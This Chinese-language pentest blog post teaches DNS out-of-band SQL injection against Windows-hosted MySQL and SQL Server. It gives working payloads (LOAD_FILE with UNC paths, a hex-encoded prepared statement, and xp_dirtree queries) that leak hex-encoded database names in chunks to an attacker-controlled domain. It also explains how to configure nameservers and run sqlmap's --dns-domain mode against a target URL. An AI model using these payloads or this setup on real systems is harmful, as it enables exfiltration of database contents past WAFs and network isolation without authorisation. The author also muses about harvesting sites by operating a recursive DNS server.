0x00 起因
实际案子的时候遇到了一个注入,过狗可以使用sqlmap
,但是是基于时间的注入和限制频率需要使用--delay
参数,本来就是延时再加上--delay
等的心力憔悴。所有有了下面介绍使用sqlmap
利用DNS
进行oob(out of band)
注入,快速出数据。一般情况下仅适用于windows
平台
0x01 场景
你有没有遇到这样类似的注入场景。
1、时间盲注,数据库、表及字段内容特别多,等到花儿也谢了。
2、mysql5.6+
只能使用mysqli
或pdo
连接方式,多推荐使用pdo连接。使用pdo
连接方式,可以执行多语句,但是PDO
只会返回第一条SQL语句的执行结果,所以一般不能直接拿到数据,*通过update
某个可见字段或者sleep
注入
3、遇到waf
拦截,含有特定内容的返回包接受不到,明明测试没有拦截过滤,感觉执行成功了,却没有接收到返回数据(能执行命令的时候也可以向web
目录写文件)
0x02 原理
使用unc
路径,会对指定的域名进行dns
查询,使用dns
信道,配合dns
服务器收到的数据可快速得到数据内容。
使用dns
有一定的好处,可以突破主机网络隔离,例如dmz主机不能直接连外网,但是配置的网络可达的dns服务器
往往可以,通过查询域名递归的方式,dns服务器
可以将返回数据通过dns协议带出去。unc
路径是windows
下的特性,默认安装的linux下不存在这样的功能。
流程图如下:
mysql
使用pdo链接数据库盲注判断是否成功的测试语句(普通的注入也可以参考)
SELECT LOAD_FILE(CONCAT('//',(SELECT 2333),'.mysql.panokaz.exeye.io/abc'));
select hex("SELECT LOAD_FILE(CONCAT('//',(SELECT 2333),'.mysql.panokaz.exeye.io/abc'));")
set @x=0x53454C454354204C4F41445F46494C4528434F4E43415428272F2F272C2853454C45435420277465737427292C272E6D7973716C2E70616E6F6B617A2E65786579652E696F2F6162632729293B;prepare a from @x;execute a;
mysql的使用场景:
之前抓到国内dns递归的上层dns服务器有360、tencent、ali的,如果我有一个这样的节点dns服务器,肯定可以收获很多羞羞的网站,想想还有点小激动呢≥▽≤sqlserver
可以使用以下方式
declare @s varchar(5000),@host varchar(5000) set @s=(host_name()) set @host=CONVERT(varchar(5000),@s)+'sqlserver.panokaz.exeye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"')
sqlserver的使用场景:
0x03 手工测试遇到的问题及解决方案
- 因为存在
dns缓存
,请求过一次域名后,会在本机产生dns记录,不会向外递归查询,所以unc路径
中DNS域名不能相同 -
unc路径
长度不能过长,通过sqlserver
报错显示以 '\\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' 开头的 标识符 太长。最大长度为 128。
可知unc路径
最大长度为128 -
unc路径
中不能含有空格等特殊字符,包含的话不会发送dns请求
以sqlserver
的注入为例,参考sqlmap
给出的方案解决
'; DECLARE @host varchar(1024);
SELECT @host='rMy.'+(SELECT TOP 1 master.dbo.fn_varbintohexstr(CAST(SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),' ')),1,13) AS VARBINARY(8000))) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM master..sysdatabases ORDER BY name) ORDER BY name)+'.Nrz.rainism.cc';
EXEC('master..xp_dirtree "\\'+@host+'\cCkc"')--
- 通过在域名中添加随机字符串
'rMy'
,'Nrz'
确保每次查询dns不存在缓存 - 通过使用
substring()
函数每次传输特定位数的数据 - 通过使用
master.dbo.fn_varbintohexstr()
存储过程对获得数据进行16禁止编码
0x04 使用sqlmap的dns-domain参数进行oob注入
这么方便快捷的注入方式怎么会没有自动化的工具,仔细看过sqlmap
文档的同学肯定知道--dns-domain
的参数,这就是sqlmap
集成的利用dns
进行oob注入
的方法
使用方法:sqlmap
使用--dns-domain
参数时候会监听53端口,我们需要把我们获得数据所使用的域名的dns服务器
配置到我们运行sqlmap的主机,就可以获得dns外带的数据。
因为配置dns服务器的时候也需要dns,所以我们需要两个域名,详细配置如下:
配置我们的用于解析dns的nameserver的域名ns1.xxx.com
,ns2.xxx.com
指向我们运行sqlmap的主机ip,这里我使用*通配符配置A记录
配置我们用于外带数据的域名rainism.cc的域名服务器为ns1.xxx.com
和ns2.xxx.com
我们在外网的vps上执行如下命令sqlmap.py -u 'http://xxoo.com/index.php?id=1*' --random-agent --dns-domain='rainism.cc' -v 3
可以看到sqlmap执行的语句和返回的数据
使用tcpdump监听53端口,可以看到回传的数据内容